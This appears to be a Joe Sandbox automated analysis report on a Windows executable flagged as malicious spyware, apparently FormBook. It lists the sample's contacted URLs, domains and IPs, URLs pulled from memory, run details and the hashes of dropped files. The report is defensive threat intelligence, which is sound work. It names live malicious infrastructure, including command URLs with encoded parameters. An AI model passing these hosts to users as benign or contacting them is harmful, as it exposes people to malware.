            http://www.theridleysuk.co.uk/frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP0%Avira URL Cloudsafe
            http://www.firmshow.top/02nb/0%Avira URL Cloudsafe
            http://www.hereboy.co.uk/4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP0%Avira URL Cloudsafe
            http://www.jl800.vip/g67v/0%Avira URL Cloudsafe
            http://www.bulletinnest.com/r7gq/100%Avira URL Cloudmalware
            http://www.hereboy.co.uk/4ez3/0%Avira URL Cloudsafe
            http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da00%Avira URL Cloudsafe
            http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP100%Avira URL Cloudmalware
            http://www.cavetta.org.mt0%Avira URL Cloudsafe
            http://www.dexiangovernment.org/a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ=0%Avira URL Cloudsafe
            http://www.dexiangovernment.org/a7b7/0%Avira URL Cloudsafe
            http://www.d99qtpkvavjj.xyz/r4rr/0%Avira URL Cloudsafe
            http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M=100%Avira URL Cloudmalware
            http://www.firmshow.top/02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.theridleysuk.co.uk/frbh/0%Avira URL Cloudsafe
            http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4=100%Avira URL Cloudmalware
            http://www.faxinguxn6.cn/ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc=0%Avira URL Cloudsafe
            http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.cavetta.org.mt
            		188.114.97.3
            		truetrue
              		unknown
              theridleysuk.co.uk
              		3.33.130.190
              		truetrue
                		unknown
                d99qtpkvavjj.xyz
                		3.33.130.190
                		truetrue
                  		unknown
                  www.firmshow.top
                  		203.161.43.228
                  		truetrue
                    		unknown
                    hereboy.co.uk
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.faxinguxn6.cn
                      		108.186.253.49
                      		truetrue
                        		unknown
                        autonomyai.xyz
                        		15.197.142.173
                        		truetrue
                          		unknown
                          8418a72e.jl800.vip.cname.scname.com
                          		38.47.158.215
                          		truetrue
                            		unknown
                            web1163.kinghost.net
                            		191.6.208.133
                            		truetrue
                              		unknown
                              bulletinnest.com
                              		135.181.212.206
                              		truetrue
                                		unknown
                                dexiangovernment.org
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  e6375a47.jl884.vip.cname.scname.com
                                  		65.181.132.158
                                  		truetrue
                                    		unknown
                                    www.rebornqababy.ru
                                    		87.236.19.243
                                    		truetrue
                                      		unknown
                                      www.autonomyai.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.hereboy.co.uk
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.erosonline.com.br
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.theridleysuk.co.uk
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.bulletinnest.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.d99qtpkvavjj.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.jl884.vip
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.jl800.vip
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.dexiangovernment.org
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.cloudsoda.xyz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.rebornqababy.ru/waey/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lPtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.jl884.vip/r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.autonomyai.xyz/b2v9/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.erosonline.com.br/2lcx/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.faxinguxn6.cn/ofk1/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cavetta.org.mt/yhnb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.theridleysuk.co.uk/frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hereboy.co.uk/4ez3/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.firmshow.top/02nb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bulletinnest.com/r7gq/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.hereboy.co.uk/4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jl800.vip/g67v/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lPtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.dexiangovernment.org/a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.d99qtpkvavjj.xyz/r4rr/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.firmshow.top/02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lPtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.theridleysuk.co.uk/frbh/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dexiangovernment.org/a7b7/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.faxinguxn6.cn/ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M=true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4=true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabconvert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://login.live.cconvert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0convert.exe, 00000008.00000002.4580175851.0000000004C2E000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000461E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.cavetta.org.mtYcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchconvert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssconvert.exe, 00000008.00000002.4580175851.0000000003C7A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000366A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2convert.exe, 00000008.00000002.4580175851.000000000490A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.00000000042FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          203.161.43.228
                                                          		www.firmshow.topMalaysia
                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                          135.181.212.206
                                                          		bulletinnest.comGermany
                                                          		24940HETZNER-ASDEtrue
                                                          108.186.253.49
                                                          		www.faxinguxn6.cnUnited States
                                                          		54600PEGTECHINCUStrue
                                                          188.114.97.3
                                                          		www.cavetta.org.mtEuropean Union
                                                          		13335CLOUDFLARENETUStrue
                                                          15.197.142.173
                                                          		autonomyai.xyzUnited States
                                                          		7430TANDEMUStrue
                                                          87.236.19.243
                                                          		www.rebornqababy.ruRussian Federation
                                                          		198610BEGET-ASRUtrue
                                                          65.181.132.158
                                                          		e6375a47.jl884.vip.cname.scname.comUnited States
                                                          		7859PAIR-NETWORKSUStrue
                                                          38.47.158.215
                                                          		8418a72e.jl800.vip.cname.scname.comUnited States
                                                          		174COGENT-174UStrue
                                                          191.6.208.133
                                                          		web1163.kinghost.netBrazil
                                                          		28299IPV6InternetLtdaBRtrue
                                                          3.33.130.190
                                                          		theridleysuk.co.ukUnited States
                                                          		8987AMAZONEXPANSIONGBtrue

                                                          General Information

                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1466070
                                                          Start date and time:2024-07-02 14:01:05 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 17s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:13
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:hkLFB22XxS.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@15/10
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 91%
                                                          • Number of executed functions: 61
                                                          • Number of non-executed functions: 269
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: hkLFB22XxS.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:03:16API Interceptor10609033x Sleep call for process: convert.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          203.161.43.228file.exeGet hashmaliciousFormBookBrowse
                                                          • www.firmshow.top/02nb/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.firmshow.top/02nb/
                                                          scanned file.exeGet hashmaliciousFormBookBrowse
                                                          • www.techfirm.life/q3aw/?atIx56=65j+Em8vbA0b9ekM8gD1O+RqXUjbhA89agcyFrOK9tIOe4qFVeCIrHPiCIBKLeJhX3EQelscWW4TvORgVFTD9t5vpuMZ0Og92YRa0F26+VtQBz5v2g==&xPz=iteHld_xl
                                                          Custom_Inv_5634756433.exeGet hashmaliciousFormBookBrowse
                                                          • www.aramoj.info/uqs4/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.firmshow.top/02nb/
                                                          Cotizacin EXP 3382.007-3 - II.exeGet hashmaliciousFormBookBrowse
                                                          • www.getmall.online/sdqf/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.firmshow.top/02nb/
                                                          D02476723.exeGet hashmaliciousFormBookBrowse
                                                          • www.aramoj.info/uqs4/
                                                          964275685.bat.exeGet hashmaliciousFormBookBrowse
                                                          • www.aramoj.info/uqs4/
                                                          (INV) 1108-11-23-033-6218 (230804-1).scr.exeGet hashmaliciousFormBookBrowse
                                                          • www.aramoj.info/uqs4/
                                                          135.181.212.206file.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/
                                                          hmwBElsQoPfbj1u.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/
                                                          Ur5XgusfXC.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/
                                                          hhghhg.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/
                                                          Scanned Documents.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/sl8p/
                                                          DHL Newly Arrived Parcel.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/sl8p/
                                                          U4atTYmWzmPN3Kz.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/r7gq/?1vd=J5YXCuAbT0imQyqdw6hZUuEbhBlebvgGBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/7lDDdpLMvGlTVbtog8QZH++iyYsBo41dM87Q=&nxY=DTA0G
                                                          Newly Arrived Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/sl8p/
                                                          Bank Failed Payment Report.exeGet hashmaliciousFormBookBrowse
                                                          • www.bulletinnest.com/sl8p/
                                                          108.186.253.49file.exeGet hashmaliciousFormBookBrowse
                                                          • www.faxinguxn6.cn/ofk1/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.faxinguxn6.cn/ofk1/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.cavetta.org.mtfile.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          hmwBElsQoPfbj1u.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          Ur5XgusfXC.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          hhghhg.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          U4atTYmWzmPN3Kz.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          www.firmshow.topfile.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          hmwBElsQoPfbj1u.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          GP128MB7m1.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          Ur5XgusfXC.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          hhghhg.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          HETZNER-ASDEfile.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 49.13.159.121
                                                          pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                                                          • 49.13.159.121
                                                          https://he110ca11he1lpn0wwb112.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                          • 195.201.57.90
                                                          https://serviceca11he1pn0waa12.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                          • 195.201.57.90
                                                          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                                          • 49.13.159.121
                                                          http://www.midoregon.comGet hashmaliciousUnknownBrowse
                                                          • 188.40.16.190
                                                          lQC7IiMNX1.elfGet hashmaliciousMiraiBrowse
                                                          • 46.4.110.33
                                                          MT103-7543324334.exeGet hashmaliciousRemcosBrowse
                                                          • 138.201.150.244
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 135.181.212.206
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 135.181.212.206
                                                          VNPT-AS-VNVNPTCorpVN94.156.79.133-mips-2024-07-01T19_26_38.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 14.248.175.67
                                                          YE40Payment3-R30819-38AIEY-39POIA-29102ND-K5920O-AO30382.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                          • 203.161.46.44
                                                          ETR-JULY-Payment291-J30172-NNR7T02-39RJ-E930A-CE4781-2IS8493.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                          • 203.161.46.44
                                                          Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.55.102
                                                          mfQABKHhh1.elfGet hashmaliciousMiraiBrowse
                                                          • 14.237.13.87
                                                          0wVYV60JHd.elfGet hashmaliciousMiraiBrowse
                                                          • 113.178.195.88
                                                          2T9ShVKj85.elfGet hashmaliciousMiraiBrowse
                                                          • 14.254.104.184
                                                          rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.62.199
                                                          Ig2G1vg5Xd.exeGet hashmaliciousPureLog StealerBrowse
                                                          • 203.161.46.44
                                                          Quotation List Pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.207
                                                          CLOUDFLARENETUSllD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          http://shippingservice-dhiexpress.dudaone.com/serviceid193811983/Get hashmaliciousUnknownBrowse
                                                          • 172.67.183.214
                                                          FNB-Copy.pdfGet hashmaliciousUnknownBrowse
                                                          • 172.64.41.3
                                                          https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                                          • 172.64.151.101
                                                          arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          https://www.aspcp.ukGet hashmaliciousUnknownBrowse
                                                          • 104.16.160.145
                                                          https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 104.26.12.205
                                                          config.lnk.mal.lnkGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 172.67.74.152
                                                          IF10339.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          PEGTECHINCUSPROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                                          • 107.148.208.115
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 108.186.253.49
                                                          1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                                          • 192.74.245.33
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 108.186.253.49
                                                          jvdETd7zDg.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 154.88.173.204
                                                          SHn7OPnmZC.elfGet hashmaliciousMiraiBrowse
                                                          • 108.186.60.14
                                                          3tz67z6uFW.exeGet hashmaliciousGhostRat, MimikatzBrowse
                                                          • 154.201.87.185
                                                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                          • 154.212.44.122
                                                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                          • 154.212.44.122
                                                          288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                                          • 107.149.174.220

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\-16743

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\convert.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\aut8EC1.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271872
                                                          Entropy (8bit):7.991032149856088
                                                          Encrypted:true
                                                          SSDEEP:6144:rmkh9mRofd6HNNZLgZJQSH21mkz1Cr/z68w7/VLwdP1Ztp1KLAIyjui:CkhUoqeZCewz1C/z68GVMdP1ZtpEdOui
                                                          MD5:A657D61808500148FDA21BA8AB86B51B
                                                          SHA1:749897AE1DC307F71C1AB0ACB94150C862997A08
                                                          SHA-256:B546A5920AB1174E6314107B1E2F3C1FD0EFA4EBAEC6B5CB4B7DCC07F25DE5D2
                                                          SHA-512:D657BABEDF758575AB0F301DCF3BADE3B21F9BDDCC0EFD5A2D171FB92D3BB86DBFFEB058EAD17E03C5210214EF2397D32113D5BFD3EA09997CCF9E2895046A7F
                                                          Malicious:false
